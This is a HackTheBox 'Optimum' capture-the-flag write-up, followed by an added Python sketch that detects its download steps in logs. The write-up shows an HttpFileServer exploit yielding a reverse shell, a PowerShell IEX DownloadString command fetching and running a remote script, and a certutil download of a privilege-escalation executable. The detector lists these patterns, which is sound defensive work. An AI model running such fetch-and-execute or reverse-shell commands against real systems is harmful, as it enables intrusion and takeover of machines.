Hackthebox - Optimum

  • Windows

Nmap

Port 80

  • We have an HttpFileServer instance

  • If we google it, we find this exploit right away

  • We need nc.exe on our attacking machine. Kali ships Windows binaries, so we can just copy it into our working dir like this: cp /usr/share/windows-resources/binaries/nc.exe .

  • We have to serve netcat using the Python HTTP server: python3 -m http.server 80

  • Then we have to modify the script and add our IP address and our port (I left 443)

  • We set a listener: rlwrap nc -lvp 443

  • We launch our exploit: python2 39161 10.10.10.8 80

  • And we get a shell

  • We can grab the user flag

Privesc

  • Win version

Kernel exploits

  • echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -

Local privesc
  • Let's find an exploit other than the one mentioned in Sherlock (does not work): searchsploit ms16-032

  • Tried a few exploits but none worked

  • On Google I found this

  • And in the comment they mention this exe file

  • We download it in our kali

  • Serve it with python

  • We get it onto our target: certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe

  • We launch it and we get a system shell

  • We can grab the root flag
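
From the defender's side, the two download steps above (the IEX/DownloadString one-liner piped into powershell and the certutil -urlcache fetch) leave recognisable traces. The following is an added example, not part of the original writeup: a Python sketch that flags them in collected events. The event format, host name and rule names are assumptions, and the sample events are constructed.

```python
import re

# Hypothetical rule names; every regex in a rule must match (case-insensitive).
RULES = {
    # certutil used as a downloader, as in the certutil step above
    "certutil_url_download": [r"\bcertutil(\.exe)?\b", r"[-/]urlcache\b", r"https?://"],
    # IEX + WebClient.DownloadString: script fetched and run in memory
    "powershell_download_cradle": [r"\b(iex|invoke-expression)\b", r"net\.webclient",
                                   r"\.downloadstring\("],
    # "powershell ... -" reads the script from stdin, so the process command
    # line itself carries no script text and no URL
    "powershell_script_from_stdin": [r"\bpowershell(\.exe)?\b", r"\s-\s*$"],
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)

def match_rules(text):
    """Return the names of all rules whose patterns all match `text`."""
    return [name for name, pats in RULES.items()
            if all(re.search(p, text, re.IGNORECASE) for p in pats)]

def scan(events):
    """Return one finding per event that matches at least one rule."""
    findings = []
    for ev in events:
        rules = match_rules(ev["text"])
        if rules:
            findings.append({"host": ev["host"], "source": ev["source"],
                             "rules": rules, "urls": URL_RE.findall(ev["text"])})
    return findings

# Constructed sample events (assumed format): "process" is a process-creation
# command line, "scriptblock" is PowerShell script block logging text.
SAMPLE_EVENTS = [
    {"host": "OPTIMUM", "source": "process",
     "text": "certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe"},
    {"host": "OPTIMUM", "source": "process", "text": "powershell -noprofile -"},
    {"host": "OPTIMUM", "source": "scriptblock",
     "text": "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1')"},
    {"host": "OPTIMUM", "source": "process",
     "text": "certutil.exe -hashfile C:\\Temp\\setup.exe SHA256"},
    {"host": "OPTIMUM", "source": "process",
     "text": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The stdin rule matters because the piped form hides the URL from the powershell command line; in this sketch the Sherlock download only shows up in the script block text.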
